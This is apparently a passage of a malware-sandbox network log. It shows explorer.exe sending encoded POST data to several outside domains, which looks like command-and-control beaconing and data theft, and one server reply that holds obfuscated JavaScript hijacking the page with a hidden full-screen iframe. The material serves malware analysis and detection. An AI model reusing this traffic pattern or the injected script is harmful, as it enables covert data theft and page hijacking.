                                                                                                                                                                          Dec 5, 2022 15:16:28.047499895 CET11577OUTData Raw: 52 45 52 63 58 53 39 59 44 65 63 5f 35 74 4a 65 6b 6f 6c 58 50 35 57 62 28 5a 36 47 5a 6a 6f 4a 7a 64 61 64 47 64 50 2d 35 46 55 52 33 42 7a 33 43 61 43 48 73 72 34 31 51 36 32 63 6d 55 76 4b 74 36 53 65 43 2d 79 48 39 58 39 76 33 35 51 44 45 7a
                                                                                                                                                                          Data Ascii: RERcXS9YDec_5tJekolXP5Wb(Z6GZjoJzdadGdP-5FUR3Bz3CaCHsr41Q62cmUvKt6SeC-yH9X9v35QDEzf4krqiAPGF9fE9zL0UIZdgVzs0q6pDMPERd9E6m-a3cZ6ZLB7TCtXkKMFzA-4tmYbM2vxxN6qv2Ati3wtimDxeXfrvHwPC236MYbZaS94asEA0R4UCQn4FqvMu2pg8UgkGtLVWX4jYM_YhRzDGUP~uiTLSeZMu3TC


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          3192.168.11.204983745.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:00.752768040 CET11087OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.searchbot.su
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.searchbot.su
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 68 71 50 63 4a 53 4c 33 50 73 74 6f 61 70 61 52 76 30 4b 52 30 70 68 4f 30 4e 45 51 34 4a 4f 38 66 61 6b 44 33 38 6c 38 43 57 66 6c 75 35 6a 6c 28 76 75 52 30 4d 55 62 33 43 72 61 63 63 35 58 47 68 44 33 65 68 6c 39 56 44 66 49 4e 55 43 4b 72 47 31 57 32 69 75 4f 35 5a 45 50 73 61 36 4f 57 50 78 66 77 41 47 37 59 43 48 6a 55 6a 61 31 6d 53 66 35 6c 49 43 67 4f 61 77 36 78 46 32 51 34 7a 38 59 52 69 6d 61 73 4b 31 65 35 63 7a 55 61 56 4d 43 64 6e 5a 52 43 69 30 62 6d 38 39 56 54 50 64 57 56 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=9jZPDiqEJGn1hqPcJSL3PstoapaRv0KR0phO0NEQ4JO8fakD38l8CWflu5jl(vuR0MUb3Cracc5XGhD3ehl9VDfINUCKrG1W2iuO5ZEPsa6OWPxfwAG7YCHjUja1mSf5lICgOaw6xF2Q4z8YRimasK1e5czUaVMCdnZRCi0bm89VTPdWVg).
                                                                                                                                                                          Dec 5, 2022 15:15:00.844695091 CET11087INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx-reuseport/1.21.1
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:00 GMT
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          30192.168.11.2049870103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:29.824801922 CET11578OUTGET /nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.005404.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:16:30.076570034 CET11580INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:29 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 1741
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: "634bbb43-6cd"
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 7d 63 61 74 63 68 28 65 29 7b 7d 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 74 72 79 7b 76 61 72 20 74 61 67 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 74 61 67 4e 61 6d 65 3b 76 61 72 20 6d 79 69 64 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 69 64 3b 69 66 28 6d 79 69 64 21 3d 22 69 63 6f
                                                                                                                                                                          Data Ascii: <html><head><meta charset="UTF-8"/><title>404 Not Found</title><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><link rel="icon" type="image/x-icon" href="http://45.122.138.45/favicon.ico"><script>document.writeln('');var ss='<div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><iframe scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="100%" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#52;&#53;&#46;&#49;&#50;&#50;&#46;&#49;&#51;&#56;&#46;&#52;&#53;&#47;"></iframe></div><style type="text/css">html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden}</style>';eval("document.write('"+ss+"');");try{setInterval(function(){try{document.getElementById("divAll").style.display="none"}catch(e){}for(var i=0;i<document.body.children.length;i++){try{var tagname=document.body.children[i].tagName;var myid=document.body.children[i].id;if(myid!="ico
                                                                                                                                                                          Dec 5, 2022 15:16:30.076657057 CET11580INData Raw: 6e 44 69 76 31 22 26 26 6d 79 69 64 21 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 29 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65
                                                                                                                                                                          Data Ascii: nDiv1"&&myid!="showcloneshengxiaon"){document.body.children[i].style.display="none"}}catch(e){}}},100)}catch(e){}</script><script>(function(){var bp=document.createElement('script');var curProtocol=window.location.protocol.split(':')[0];if(cur


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          31192.168.11.204987166.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:43.326953888 CET11582OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gouldent.site
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 69 47 6b 58 47 74 4d 66 67 68 50 53 46 6d 38 41 36 78 53 4d 69 73 75 55 64 45 71 66 6c 7a 51 7a 4c 76 38 51 6b 57 70 4f 7a 6e 4c 73 73 6f 28 32 67 50 61 6f 32 2d 28 7a 33 5a 6e 6d 39 4d 6f 6f 49 54 55 51 6d 66 6d 4d 32 39 77 75 7a 48 73 6d 51 31 41 73 53 54 52 34 77 4a 68 4f 6c 55 4f 41 52 56 74 32 32 55 52 66 59 6d 69 72 47 63 33 5a 30 6e 4e 44 51 63 56 4b 48 4c 45 38 46 68 55 58 79 4d 62 6f 43 47 6a 75 37 37 39 63 75 30 4e 7a 7e 77 6c 30 68 49 45 69 62 79 4b 55 4c 49 4e 44 73 67 75 6a 6a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=4aNeThNKxkEEiGkXGtMfghPSFm8A6xSMisuUdEqflzQzLv8QkWpOznLsso(2gPao2-(z3Znm9MooITUQmfmM29wuzHsmQ1AsSTR4wJhOlUOARVt22URfYmirGc3Z0nNDQcVKHLE8FhUXyMboCGju779cu0Nz~wl0hIEibyKULINDsgujjg).
                                                                                                                                                                          Dec 5, 2022 15:16:43.668857098 CET11583INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:43 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          32192.168.11.204987266.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:45.511632919 CET11584OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gouldent.site
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 30 7a 49 4b 59 51 32 44 46 4f 77 6e 4c 73 7e 49 28 33 76 76 62 6d 32 35 32 4f 33 64 6e 6d 39 49 34 6f 49 67 73 51 33 5f 6d 50 39 64 77 70 30 48 73 6c 62 56 41 6d 53 54 64 56 77 49 6c 4f 6c 46 69 41 51 58 46 32 79 41 46 63 64 47 69 70 54 4d 33 59 7e 48 4e 6b 51 63 6f 31 48 4b 74 48 45 54 49 58 79 73 37 6f 51 57 6a 68 68 37 38 55 78 45 4d 74 78 69 45 62 6d 70 45 4b 4d 51 61 7a 4b 72 51 51 76 6b 47 70 28 4c 4f 6a 71 6d 59 78 4f 79 58 5f 33 67 42 44 4d 64 6a 41 57 33 69 50 48 54 39 67 4f 52 4f 36 68 6a 38 63 75 4d 53 6b 34 34 4d 6d 63 72 79 41 5a 45 37 57 65 4a 6b 4b 28 78 79 68 62 71 48 79 4b 6c 74 30 58 63 34 53 62 44 42 38 70 62 77 49 74 79 52 6f 78 4d 52 77 7a 32 65 71 56 5a 4b 37 58 31 32 61 51 67 58 6a 57 5a 67 68 6f 37 30 6c 6b 61 66 65 32 34 4a 58 67 37 68 7a 70 56 35 4f 4e 51 4e 41 33 72 38 71 4a 34 46 46 7e 54 6a 74 4a 55 59 6c 36 47 31 45 73 63 7e 5f 46 48 61 39 73 4c 65 72 76 2d 42 4c 36 44 33 6c 4f 77 79 5f 48 62 7a 6a 42 56 39 46 6a 4c 52 63 4b 61 65 71 6a 70 73 47 76 76 69 66 51 68 7e 38 56 30 75 75 63 33 48 69 38 5a 32 4c 43 78 4a 7a 30 36 43 75 35 31 43 67 77 66 34 76 73 36 4c 75 45 41 7e 4e 71 35 62 43 70 61 38 6d 58 7a 4e 31 75 48 76 4d 38 71 46 6a 61 4c 35 75 41 74 6e 77 71 30 67 35 49 58 79 50 5a 45 61 33 6c 46 32 42 70 64 77 50 7a 58 41 7a 67 38 58 57 54 79 4e 41 59 6d 67 30 54 4d 75 68 41 55 55 73 46 7a 6e 43 67 75 6b 44 78 48 49 79 37 6d 39 2d 7e 6a 6a 66 48 58 6a 58 74 73 30 67 78 73 38 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB0zIKYQ2DFOwnLs~I(3vvbm252O3dnm9I4oIgsQ3_mP9dwp0HslbVAmSTdVwIlOlFiAQXF2yAFcdGipTM3Y~HNkQco1HKtHETIXys7oQWjhh78UxEMtxiEbmpEKMQazKrQQvkGp(LOjqmYxOyX_3gBDMdjAW3iPHT9gORO6hj8cuMSk44MmcryAZE7WeJkK(xyhbqHyKlt0Xc4SbDB8pbwItyRoxMRwz2eqVZK7X12aQgXjWZgho70lkafe24JXg7hzpV5ONQNA3r8qJ4FF~TjtJUYl6G1Esc~_FHa9sLerv-BL6D3lOwy_HbzjBV9FjLRcKaeqjpsGvvifQh~8V0uuc3Hi8Z2LCxJz06Cu51Cgwf4vs6LuEA~Nq5bCpa8mXzN1uHvM8qFjaL5uAtnwq0g5IXyPZEa3lF2BpdwPzXAzg8XWTyNAYmg0TMuhAUUsFznCgukDxHIy7m9-~jjfHXjXts0gxs8.
                                                                                                                                                                          Dec 5, 2022 15:16:45.811323881 CET11585INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:45 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          33192.168.11.204987366.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:47.697463036 CET11590OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gouldent.site
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 38 7a 4c 38 55 51 6b 30 78 4f 78 6e 4c 73 6c 49 28 79 76 76 62 72 32 5f 66 4a 33 64 72 51 39 4f 6b 6f 49 7a 45 51 33 4b 79 50 34 64 77 6f 37 6e 73 6e 51 31 41 79 53 54 52 61 77 49 67 31 6c 55 57 41 52 58 31 32 32 79 74 66 54 32 69 72 54 4d 33 63 36 48 4e 7a 51 63 74 6f 48 4b 68 48 45 52 38 58 7a 66 44 6f 44 31 62 68 31 62 38 56 6f 30 4e 74 34 43 45 36 6d 70 67 65 4d 51 61 46 4b 70 38 51 76 6a 79 70 7e 4d 36 69 70 47 59 78 51 43 58 34 7a 68 39 48 4d 64 76 75 57 33 57 50 48 52 74 67 4e 78 4f 36 6b 43 38 66 34 38 53 69 79 59 4e 67 57 4c 75 49 5a 41 54 43 65 49 41 4b 34 42 6d 68 61 5a 76 79 4d 48 4a 30 65 63 34 51 47 7a 42 76 6a 37 77 55 74 79 41 42 78 50 5a 61 7a 30 79 71 45 4c 53 37 54 55 32 56 48 77 57 71 61 35 68 37 73 37 78 6b 6b 61 75 66 32 34 4a 35 67 2d 52 7a 75 6b 4a 4f 4f 52 4e 48 30 37 39 44 42 59 45 48 30 7a 76 33 4a 55 73 39 36 46 31 55 73 64 32 5f 47 6e 61 39 75 73 4b 71 6c 4f 42 4d 6c 7a 32 71 54 67 79 57 48 63 37 4a 42 51 46 5f 69 34 46 63 4a 4f 36 71 70 5a 73 46 72 50 69 62 57 52 7e 2d 65 55 75 75 63 77 4f 62 38 5a 79 4c 43 6b 74 7a 30 4e 6d 75 70 32 61 67 32 66 34 74 73 36 4c 7a 45 41 69 45 71 35 43 56 70 61 73 41 58 77 39 31 75 57 28 4d 28 76 78 67 66 37 35 6e 53 64 6d 6f 31 6b 38 75 49 58 75 48 5a 41 47 34 6b 33 69 42 6f 64 41 50 69 48 41 79 79 73 58 56 62 53 4e 61 4a 32 63 53 54 4d 7a 55 41 55 49 47 46 30 62 43 73 70 51 55 